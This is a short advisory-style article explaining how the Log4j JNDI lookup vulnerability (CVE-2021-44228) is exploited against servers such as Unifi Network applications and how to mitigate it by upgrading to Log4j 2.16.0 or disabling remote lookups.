Unifi Network applications are being targeted in a similar way to the VMWare Horizon that were being attacked through the Log4j vulnerability.
A high severity vulnerability impacting multiple versions of Apache Log4j. The vulnerability allows for unauthenticated remote code execution. The attacker sends specially crafted HTTP requests to the servers running Apache Log4j 2. Normally the logging frameworks consider all the messages that they receive as text and handle them accordingly with basic formatting, however, Log4j 2.0 added the lookup to add values to the logs.
Multiple types of lookups were provided in Log4j 2.0 like “Context Map Lookup”, “Date Lookup”, “JVM Input Arguments Lookup (JMX)”, “web Lookup”, “JNDI Lookup”, etc. The Java Naming and Directory Interface (JNDI) is a Java API to access a variety of naming and directory services like LDAP, DNS, etc.
The JNDI lookups were not restricted to the local environment. An attacker sends a specially crafted HTTP request to trigger the JNDI lookup. When the lookup is triggered, the server running the Log4j will go over the internet to look up the request which will be the attacker server downloading the malicious code/payload.
Exploits and Proof of Concept were published online for the CVE-2021-44228 vulnerability. Environments with user input hosted on a Java application with unpatched and vulnerable versions of log4j 2.15.0 and lower run the risk of being attacked.
The attack has 2 phases. In the first phase, the attacker sends the specially crafted HTTP request to the server having the JNDI lookup to the attacker server. In the second phase, the malicious payload is downloaded from the attacker server to the victim.
Version 2.16.0 has been released without the vulnerability. Upgrade to Log4j Version 2.16.0.
If upgrading to version 2.16.0 is not possible at the moment, then the following workarounds can be done for mitigating the
As the lookups are done using the Java packages for JNDI API (com.sun.JNDI.ldap.object.trustURLCodebase) or by
(InitialContext().lookup(“lookup address”)) by creating an instance using (org.apache.naming.factory.BeanFactory), we have
to disable the lookups functionality for the remote serves to mitigate the vulnerability.